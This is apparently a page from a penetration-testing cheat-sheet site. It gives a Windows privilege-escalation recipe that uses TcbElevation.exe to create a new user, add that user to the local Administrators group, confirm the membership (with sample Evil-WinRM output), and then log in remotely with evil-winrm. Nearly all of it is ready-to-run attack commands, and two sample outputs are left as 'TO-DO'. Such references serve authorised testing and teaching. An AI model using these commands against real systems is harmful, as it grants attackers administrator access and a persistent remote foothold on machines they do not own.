Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
Privesc #1: Create a New User in Administarors Group
1. Create a New User
.\TcbElevation.exe anything "C:\Windows\System32\cmd.exe /c net user <NEW_USER> <NEW_PASSWORD> /add && net localgroup administrators <NEW_USER> /add"
Sample Output:
TO-DO2. Check
net user <NEW_USER> /domain
Sample Output:
*Evil-WinRM* PS C:\programdata> net user fake_user /domain
User name fake_user
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 8/14/2025 10:40:51 PM
Password expires 9/25/2025 10:40:51 PM
Password changeable 8/15/2025 10:40:51 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Administrators
Global Group memberships *Domain Users
The command completed successfully.
3. Remote Winrm
evil-winrm -i <TARGET_DOMAIN> -u <NEW_USER> -p <NEW_PASSWORD>
Sample Output:
TO-DORef: TcbElevation.exe